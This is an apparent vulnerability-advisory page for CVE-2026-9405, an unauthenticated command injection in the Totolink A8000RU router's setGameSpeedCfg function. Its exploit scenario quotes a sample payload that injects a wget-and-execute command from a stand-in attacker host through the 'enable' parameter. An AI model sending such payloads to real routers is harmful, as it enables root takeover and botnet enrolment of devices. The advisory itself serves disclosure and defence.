Skip to main content

Totolink A8000RU CVE-2026-9405

| EUVD-2026-31608 HIGH
OS Command Injection (CWE-78)
2026-05-24 VulDB GHSA-gm67-x7fw-5m4h
Command Injection A8000Ru
8.9
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
8.9 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 08, 2026 - 09:19 vuln.today
Severity Changed
May 26, 2026 - 19:07 NVD
CRITICAL HIGH
CVSS changed
May 26, 2026 - 19:07 NVD
9.8 (CRITICAL) 8.9 (HIGH)

DescriptionCVE.org

A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setGameSpeedCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument enable results in os command injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.

AnalysisAI

OS command injection in the Totolink A8000RU router (firmware 7.1cu.643_b20200521) allows remote unauthenticated attackers to execute arbitrary operating system commands by manipulating the 'enable' parameter passed to the setGameSpeedCfg function in /cgi-bin/cstecgi.cgi. Publicly available exploit code exists, raising the practical threat despite a modest EPSS score of 0.89% (76th percentile). …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify exposed A8000RU management interface
Delivery
Send crafted POST to /cgi-bin/cstecgi.cgi setGameSpeedCfg
Exploit
Inject shell metacharacters via 'enable' parameter
Execution
Execute arbitrary commands as root
Persist
Install persistence or botnet implant
Impact
Pivot to internal LAN hosts
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The attacker needs network reachability to the router's Web Management Interface on the cstecgi.cgi endpoint and the ability to issue a request invoking the setGameSpeedCfg function with a controlled 'enable' parameter; no authentication, user interaction, or non-default configuration is indicated by the CVSS 4.0 vector (PR:N/UI:N/AC:L/AT:N). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N, VC:H/VI:H/VA:H) scores 8.9 and reflects remote, low-complexity, unauthenticated exploitation with high confidentiality, integrity, and availability impact on the vulnerable component, which aligns with SSVC's 'Technical Impact: total' and 'Automatable: yes' classifications. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker reachable over the network sends a crafted HTTP POST request to /cgi-bin/cstecgi.cgi targeting the setGameSpeedCfg action with a shell metacharacter payload in the 'enable' parameter (e.g., 'enable=1;wget http://attacker/x -O /tmp/x;sh /tmp/x'), causing the router to execute the injected commands as root. Because a public PoC is available on GitHub and no authentication is required, this can be automated to scan and compromise exposed A8000RU devices at scale, enrolling them into a botnet or pivoting into the LAN.
Remediation No vendor-released patch identified at time of analysis - Totolink has not published a fixed firmware version in the references provided (https://www.totolink.net/, https://vuldb.com/vuln/365386, https://nvd.nist.gov/vuln/detail/CVE-2026-9405). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

24 hours: Identify all Totolik A8000RU devices in inventory and map network exposure. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-9405 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy